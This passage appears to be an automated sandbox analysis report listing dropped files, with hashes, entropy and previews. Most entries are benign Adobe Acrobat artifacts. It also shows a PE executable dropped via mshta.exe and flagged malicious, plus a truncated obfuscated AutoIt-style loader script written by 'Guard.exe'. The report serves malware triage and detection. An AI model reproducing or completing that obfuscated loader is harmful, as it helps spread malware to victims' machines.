                                                                    Category:dropped
                                                                    Size (bytes):287
                                                                    Entropy (8bit):5.22690634012649
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJf21rPeUkwRe9:YvXKXFVW7M1UYpW7/UnG+16Ukee9
                                                                    MD5:E0F45E57B0E9D468BD396C0C0B0AF75B
                                                                    SHA1:1E61692B057E831C973F14469C286DCA4835BE14
                                                                    SHA-256:D1172F13F7AF85E041018A625B97E584578B5720E8E2CBF260D5F735A01A2FEB
                                                                    SHA-512:842B1E940675E0734B008EDC8B54E03DD970D58D01A3EC2B3A291F096F388AE0E0FBD3B534647A03F43CD84B85BFBC993CB33A28367EE7CE46AB259D1A9FE1E5
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1090
                                                                    Entropy (8bit):5.655864601085958
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6X06Fi/UYamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSG:Yv3ceBgkDMUJUAh8cvMG
                                                                    MD5:7AB7B5ADA3F329A1FCA7297E46B4D1A5
                                                                    SHA1:50C1055E27EC421A1E7523CF4E4B34A29D4EB86F
                                                                    SHA-256:16252809F11748C4A352E01360D734A86B25D0F2DD9F62A30AA595CCA0F2FED9
                                                                    SHA-512:81087583F1517FFB3E906CA9BC90D68B23443528A4BC30B0290A1FDD45038F7183260FA57C08E61CDAF113143A1862E9DC43396069253325D99AAB429E674C59
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):286
                                                                    Entropy (8bit):5.202036477597807
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfshHHrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGUUUkee9
                                                                    MD5:8991FF9FA51640F7E3AE5232BA0E3FB9
                                                                    SHA1:B3D20F0CD603BFAF4E69475067F0B2B3C15F3860
                                                                    SHA-256:7B7ABE43836BD4F55905834AE2D469C4ACE1F26CD81A626E6D9861090D337230
                                                                    SHA-512:AFE54590CD8E7DA66BE3E26D008994A9CFEC4DDC88D619695A2B78DCCDF4763CDFC2C5F816FCC1207050CCA53E7359F7083EB20FA1ABAB3D0C4462EA126508A9
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):282
                                                                    Entropy (8bit):5.209959087707028
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJTqgFCrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGTq16Ukee9
                                                                    MD5:A1ED34BD8A5785B0B5A95E4731F10CE5
                                                                    SHA1:2F56FE053D819D951F971D0F81D48C54FAB14BCA
                                                                    SHA-256:68A3BF8E4178E71087DF05ED3B14A22F2D256BE29E2D8C169DBCD90F3BDFC165
                                                                    SHA-512:6964F3985674C011119DEF678742AC61403122FC67BFB4F01106B0446604CEB2ACCD6562451A365659DAA4E82FC92DA1A76CB4BD1AE72FB3CF4531672E4551DC
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):0.8112781244591328
                                                                    Encrypted:false
                                                                    SSDEEP:3:e:e
                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                    Malicious:false
                                                                    Preview:....
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):2814
                                                                    Entropy (8bit):5.132594830311187
                                                                    Encrypted:false
                                                                    SSDEEP:24:YvA1vaQWFHayKswgqrnN6YwPqWzwuxjMG4j0Sne8BCz2E/2LS5CN8gbR8Ek5U/7h:YYDYTXoN1LgQ9Ix3i8G8Ti/79M0h
                                                                    MD5:452819620804BB1EA63F697581F8B3B4
                                                                    SHA1:3DCA3FE29E0E573E7EF9CBCF8E444E28867FC8BE
                                                                    SHA-256:B2B8DB1BCDF5DFE576FE89C44B52713536C7ED4EB732CF83E3BAD41DB2CEE5E2
                                                                    SHA-512:F591350A4BE4618C5A970A2022CD2008E6E160351BAB7F5ADFB8DC0545E24772340F3B1E7CAF3F62F2971D791AF75875C31C99358326AFB322E2F388425F914F
                                                                    Malicious:false
                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"596fd5299c1b5cf1ca755dfc983a0d05","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734509595000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c8bc4500d4aebb8b962c2f03a16ac819","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734509595000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c4be4bce37b2eef005aafbb46655529f","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734509595000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"155e97d759b6ec70b482e40970253e65","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734509595000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"539fe23b096b501d721fbbf18e76ce53","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734509595000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"e49eb8727fc3040dfcaacdc007182f2b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):0.9846647752991913
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpDYv4zJwtNBwtNbRZ6bRZ4yYvF:TVl2GL7ms6ggOVpDYgzutYtp6PVY9
                                                                    MD5:196E4850DCEEAA3E62BEF03B55558BA9
                                                                    SHA1:319BAEBAE04047E8B15F7FC3E12DD6CF837B1F6F
                                                                    SHA-256:F641A323BC39FC6CA62086FDC895E7FC38AA57505A6236C95C50135A43C38F23
                                                                    SHA-512:29BA3B00B01C07832F9167ED30E7ED112D6D0A12790F482ED0D088ABBB9A9697EF0E99C1DF5B8B02AC998C53ADAD6DC1F8668023084AF3CADD3AE0063BA24BD7
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):8720
                                                                    Entropy (8bit):1.339152947036606
                                                                    Encrypted:false
                                                                    SSDEEP:24:7+tYAD1RZKHs/Ds/SpDYvPzJwtNBwtNbRZ6bRZWf1RZKEqLBx/XYKQvGJF7ursX:7MYGgOVpDYHzutYtp6PMJqll2GL7msX
                                                                    MD5:9BA5316AF917988CCB58490A640F2491
                                                                    SHA1:C46FA9AD582BBFDE3C31BA2B18CA0B91B042D000
                                                                    SHA-256:A0829B6870CC781F2C383B34F91089E5D9132D502646400C5329CB196FEB1C02
                                                                    SHA-512:09FB04AF7DE497CEEB2519B2F5394D38F2F261163B064A6D28D75D6985BDAC9F24D2D9218544F1A341D798857F9B2DC19AD3ADC8A0CCFB0EF01437B52ABCAE14
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):66726
                                                                    Entropy (8bit):5.392739213842091
                                                                    Encrypted:false
                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEg6eZ8/ZglGv5MlAZ36ldSWEzYckYyu:6a6TZ44ADE6eZ8glGv0vEzYHK
                                                                    MD5:30481C3B25BCA8F31D113A8FE31931D4
                                                                    SHA1:61DB009BBF83A44BDA33AFC766043C145FA84B08
                                                                    SHA-256:4314DBBE746BF16B19177F61219DC70E5F8C1E78E6DB577D19BF311478A05DB8
                                                                    SHA-512:0AE55DA2B7A572868E6E31DB7843BCDF97306083F32F13129CC1EEED6B4B788FF1A6F2A67B92004B363BA401DC132BB0131A8C97B4F857574389178904435951
                                                                    Malicious:false
                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                    Process:C:\Windows\System32\mshta.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):78114
                                                                    Entropy (8bit):4.994794569777259
                                                                    Encrypted:false
                                                                    SSDEEP:768:fsnZcnsXsnZcnsWxojUsnZcnsGCsnZcns:EZcbZcvxoRZcLZc
                                                                    MD5:7F1392C63A92E5F06FA6F9F95F103CD9
                                                                    SHA1:26D5CD231FC46C96B71DFBF4D08768C38399F027
                                                                    SHA-256:22B77AC7A5ABC7DF6BC21C1411121242E0A9F7179EF5DBBDDCE745AE04A13E21
                                                                    SHA-512:089EA813ED8E4F5CFD854D06D6EBA66BEC924F74B29329B95FF46D0C875CD05EA6BAADFBB71C79FF5E6DCE112D2A7AC90EA6BE17F39454281DF06B83D5FD1A9F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):246
                                                                    Entropy (8bit):3.51161293806784
                                                                    Encrypted:false
                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDg7:Qw946cPbiOxDlbYnuRKSE7
                                                                    MD5:664818485FA149DEB73B771C22D621EF
                                                                    SHA1:7C5FE102E408EFFA20FEC670F61E9D18FE20F964
                                                                    SHA-256:82F261AFB5CE3060723DB37A34A1798FB09582A6C54522D8429E9DACD3493E38
                                                                    SHA-512:313CBE8BEE20CE2AD61E752AB28803B086A1E32A1FD2DCB3336B264CC83E294BB6B78C7DF9E69C935103646EFDE52DEDC12BC2BE3ABCA98F0554E038898779E0
                                                                    Malicious:false
                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .0.3.:.1.3.:.1.7. .=.=.=.....
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393)
                                                                    Category:dropped
                                                                    Size (bytes):16525
                                                                    Entropy (8bit):5.376360055978702
                                                                    Encrypted:false
                                                                    SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                    MD5:1336667A75083BF81E2632FABAA88B67
                                                                    SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                    SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                    SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                    Malicious:false
                                                                    Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15114
                                                                    Entropy (8bit):5.385228036583042
                                                                    Encrypted:false
                                                                    SSDEEP:384:UfgTg6gjgjgOgMMg6g1g1gAvgigLNf/g3BV4Q7wcRG2oAgvgHTRJ5FpBLB3SDkMa:5Gb
                                                                    MD5:4A5154176CA09016D9B066DECFD1C00A
                                                                    SHA1:60B65CD97CD6AE9862E32B7FB5F80E3B1D62AC89
                                                                    SHA-256:C635A9D1F97E49C3590C6362734FBAEB7ECE0F63FE495A70075EB3B8603104DA
                                                                    SHA-512:02DCDAE9D850131C8450900EC1316EF785B30EFDE0130B517EB25F20855B07641851A09DB28D752464C76EE5DB9B484C26BD045B82CEE837BC584CBC85D6CCAD
                                                                    Malicious:false
                                                                    Preview:SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:227-0500 ThreadID=7684 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_NglAppLib Description="SetConf
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):29752
                                                                    Entropy (8bit):5.39863434600666
                                                                    Encrypted:false
                                                                    SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb3:j
                                                                    MD5:B36DE20FA1A860170F6D4747603EEC0E
                                                                    SHA1:2A1619E46965BF592D21B08538136A94B5DB4699
                                                                    SHA-256:CEA2F0D9D01B37658C335E16DD266CD3F71EC856B6A86503578D0639D9BD1798
                                                                    SHA-512:EB0DA9C7D1D8C174FC44074316DA7CAEEF92B71C74069405715D0E943B0EE5C9EDA1A258E0CD6BE3F43C0ED45D8DAC5732247483DAB7DD401F7BDCA6F7C1E1F7
                                                                    Malicious:false
                                                                    Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                    Category:dropped
                                                                    Size (bytes):758601
                                                                    Entropy (8bit):7.98639316555857
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                    MD5:3A49135134665364308390AC398006F1
                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                    Category:dropped
                                                                    Size (bytes):386528
                                                                    Entropy (8bit):7.9736851559892425
                                                                    Encrypted:false
                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                    Category:dropped
                                                                    Size (bytes):1419751
                                                                    Entropy (8bit):7.976496077007677
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/6ZwYIGNPgeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:CZwZG/WLxXGZN3mlind9i4ufFXpAXkru
                                                                    MD5:59456AEBFE40D51DCD738AF1B2D65A03
                                                                    SHA1:953094EDE30485AB6E071F8A0BF64D9BC1C34227
                                                                    SHA-256:1C21F3042C5972DE59996ED10C08D9072E9F2643F65ED69355CD5B2E7735067D
                                                                    SHA-512:CB3AF6D15DC5F111D80FD5B4599E204721ABEC89AD44D7C0A41C19E515E01F2541CE38C673628640A24DFCBA5D5AF242D95203FEBD1E9ADAE787F13419644E9D
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                    Category:dropped
                                                                    Size (bytes):1407294
                                                                    Entropy (8bit):7.97605879016224
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/yawYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07mWL07oXGZd:3wZG2b3mlind9i4ufFXpAXkrfUs0CWLk
                                                                    MD5:CFE92F09B3CF5F1D659B8E273EA6BE32
                                                                    SHA1:5434B8D5E70B5C581C383413B92C835DD7E9D8CC
                                                                    SHA-256:6E57E3E8E384579FE6B1F8BE103EBD1DBC57FC80171A1E34CB87C29603FBD601
                                                                    SHA-512:838DF787F3032E647AFF8F311C829C5E2F39C47EC432BD0A51F6B262C0C5CB6F63802DCB2DD4F92EFC4C816372E65AEDF4E19D4346793D1D94A485A8FF94A60C
                                                                    Malicious:false
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1240100
                                                                    Entropy (8bit):5.144277296271024
                                                                    Encrypted:false
                                                                    SSDEEP:12288:D8V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:DcB7HxicaEmEQD3I1jUZ
                                                                    MD5:078A35D34863F9421F702C3044DA8A1F
                                                                    SHA1:1D34A5EF73992231F1E5857A462359596647E0F6
                                                                    SHA-256:6E32AE2A7776564163BE157BAEE93FCB156A5030D620C71D9FCF33D9A7CBC925
                                                                    SHA-512:67EEB87AEE2567513FC6D5AE241E62D73874980EC18BB77C46DF4191A2EC64A6DB1200F7541B0F6E908B66D39ACE1D483CD1E33E90C165A6DBA01C35536E1541
                                                                    Malicious:false
                                                                    Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):186
                                                                    Entropy (8bit):4.7401751318145395
                                                                    Encrypted:false
